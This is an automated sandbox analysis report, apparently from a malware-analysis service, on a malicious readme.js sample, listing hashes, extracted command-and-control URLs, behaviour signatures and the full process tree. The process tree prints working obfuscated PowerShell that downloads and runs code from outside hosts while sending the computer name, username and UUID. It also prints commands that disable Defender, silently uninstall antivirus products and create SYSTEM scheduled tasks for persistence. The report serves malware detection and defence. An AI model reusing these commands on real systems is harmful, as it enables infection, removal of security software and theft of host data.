Analysis
-
max time kernel
15s -
max time network
89s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-01-2021 06:49
Static task
static1
Behavioral task
behavioral1
Sample
readme.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
readme.js
Resource
win10v20201028
General
-
Target
readme.js
-
Size
10KB
-
MD5
db49b6f1f379122685be9553c5cc0f37
-
SHA1
45788a5c0c0d97d9bed9c0e6115eca1edbad8ba6
-
SHA256
d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09
-
SHA512
1eae9f302d90b3a1887b9f74927bf9bfac0519ae0f4019497177eca3ac2086ed71b4296193bcf62ba493d7fe2e4d57f42ded79ed5e8789abca206a2185ebab23
Malware Config
Extracted
http://t.zz3r0.com
Extracted
http://t.zer9g.com
Extracted
http://t.bb3u9.com
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 4052 powershell.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3972 schtasks.exe 3872 schtasks.exe 4528 schtasks.exe 4324 schtasks.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 696 notepad.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 2260 powershell.exe 2260 powershell.exe 2260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4052 powershell.exe Token: SeIncreaseQuotaPrivilege 4052 powershell.exe Token: SeSecurityPrivilege 4052 powershell.exe Token: SeTakeOwnershipPrivilege 4052 powershell.exe Token: SeLoadDriverPrivilege 4052 powershell.exe Token: SeSystemProfilePrivilege 4052 powershell.exe Token: SeSystemtimePrivilege 4052 powershell.exe Token: SeProfSingleProcessPrivilege 4052 powershell.exe Token: SeIncBasePriorityPrivilege 4052 powershell.exe Token: SeCreatePagefilePrivilege 4052 powershell.exe Token: SeBackupPrivilege 4052 powershell.exe Token: SeRestorePrivilege 4052 powershell.exe Token: SeShutdownPrivilege 4052 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe Token: SeSystemEnvironmentPrivilege 4052 powershell.exe Token: SeRemoteShutdownPrivilege 4052 powershell.exe Token: SeUndockPrivilege 4052 powershell.exe Token: SeManageVolumePrivilege 4052 powershell.exe Token: 33 4052 powershell.exe Token: 34 4052 powershell.exe Token: 35 4052 powershell.exe Token: 36 4052 powershell.exe Token: SeIncreaseQuotaPrivilege 4052 powershell.exe Token: SeSecurityPrivilege 4052 powershell.exe Token: SeTakeOwnershipPrivilege 4052 powershell.exe Token: SeLoadDriverPrivilege 4052 powershell.exe Token: SeSystemProfilePrivilege 4052 powershell.exe Token: SeSystemtimePrivilege 4052 powershell.exe Token: SeProfSingleProcessPrivilege 4052 powershell.exe Token: SeIncBasePriorityPrivilege 4052 powershell.exe Token: SeCreatePagefilePrivilege 4052 powershell.exe Token: SeBackupPrivilege 4052 powershell.exe Token: SeRestorePrivilege 4052 powershell.exe Token: SeShutdownPrivilege 4052 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe Token: SeSystemEnvironmentPrivilege 4052 powershell.exe Token: SeRemoteShutdownPrivilege 4052 powershell.exe Token: SeUndockPrivilege 4052 powershell.exe Token: SeManageVolumePrivilege 4052 powershell.exe Token: 33 4052 powershell.exe Token: 34 4052 powershell.exe Token: 35 4052 powershell.exe Token: 36 4052 powershell.exe Token: SeDebugPrivilege 2260 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
wscript.execmd.exepowershell.exedescription pid process target process PID 648 wrote to memory of 2848 648 wscript.exe cmd.exe PID 648 wrote to memory of 2848 648 wscript.exe cmd.exe PID 2848 wrote to memory of 696 2848 cmd.exe notepad.exe PID 2848 wrote to memory of 696 2848 cmd.exe notepad.exe PID 2848 wrote to memory of 4052 2848 cmd.exe powershell.exe PID 2848 wrote to memory of 4052 2848 cmd.exe powershell.exe PID 4052 wrote to memory of 2452 4052 powershell.exe cmd.exe PID 4052 wrote to memory of 2452 4052 powershell.exe cmd.exe PID 4052 wrote to memory of 2260 4052 powershell.exe powershell.exe PID 4052 wrote to memory of 2260 4052 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\notepad.exenotepad C:\Users\Admin\AppData\Local\Temp\readme.js3⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Eset%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avast%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avp%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \eDTR6r3P4nC /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \eDTR6r3P4nC4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn LmHfWZxK4\4aSTNpL0 /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn LmHfWZxK4\4aSTNpL04⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\FI1O5lZUNgL\C4tHFX /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\FI1O5lZUNgL\C4tHFX4⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logMD5
8a313b70fd641fc4e6fffb40391d0b4d
SHA122684fe19ecd7943ac18e622db0d7f161db500e8
SHA256bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911
SHA5125b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
b7ce5874fdff5e4fccdc0fbd21ae7971
SHA1980d0d37b937620706eabba421e2e5b30a4b15f7
SHA2561933f8e519dbd64305997d47fa8a68b2184a8a66ea1d187cc82d788e684fe4b9
SHA5127e33fdf9cc1f1525b23fc960d2e8294d34272701100877a2a5b1028f32e7161e38d8e518bf41ddcca9a050755b05efa3cb86ba22c8e89e06555482a6ab04ee3b
-
memory/208-15-0x0000000000000000-mapping.dmp
-
memory/696-3-0x0000000000000000-mapping.dmp
-
memory/868-24-0x0000000000000000-mapping.dmp
-
memory/1188-19-0x0000000000000000-mapping.dmp
-
memory/1836-21-0x0000000000000000-mapping.dmp
-
memory/2052-25-0x0000000000000000-mapping.dmp
-
memory/2116-20-0x0000000000000000-mapping.dmp
-
memory/2260-12-0x0000024FCF2E0000-0x0000024FCF2E1000-memory.dmpFilesize
4KB
-
memory/2260-10-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmpFilesize
9.9MB
-
memory/2260-9-0x0000000000000000-mapping.dmp
-
memory/2452-8-0x0000000000000000-mapping.dmp
-
memory/2848-2-0x0000000000000000-mapping.dmp
-
memory/2932-22-0x0000000000000000-mapping.dmp
-
memory/2996-23-0x0000000000000000-mapping.dmp
-
memory/3024-17-0x0000000000000000-mapping.dmp
-
memory/3032-18-0x0000000000000000-mapping.dmp
-
memory/3124-27-0x0000000000000000-mapping.dmp
-
memory/3356-14-0x0000000000000000-mapping.dmp
-
memory/3872-28-0x0000000000000000-mapping.dmp
-
memory/3872-30-0x0000000000000000-mapping.dmp
-
memory/3920-26-0x0000000000000000-mapping.dmp
-
memory/3972-29-0x0000000000000000-mapping.dmp
-
memory/4052-7-0x00000171E4140000-0x00000171E4141000-memory.dmpFilesize
4KB
-
memory/4052-6-0x00000171E3F90000-0x00000171E3F91000-memory.dmpFilesize
4KB
-
memory/4052-5-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmpFilesize
9.9MB
-
memory/4052-4-0x0000000000000000-mapping.dmp
-
memory/4076-16-0x0000000000000000-mapping.dmp
-
memory/4216-31-0x0000000000000000-mapping.dmp
-
memory/4236-32-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmpFilesize
9.9MB
-
memory/4268-44-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmpFilesize
9.9MB
-
memory/4288-43-0x0000000000000000-mapping.dmp
-
memory/4324-42-0x0000000000000000-mapping.dmp
-
memory/4528-35-0x0000000000000000-mapping.dmp
-
memory/4732-36-0x0000000000000000-mapping.dmp
-
memory/4752-38-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmpFilesize
9.9MB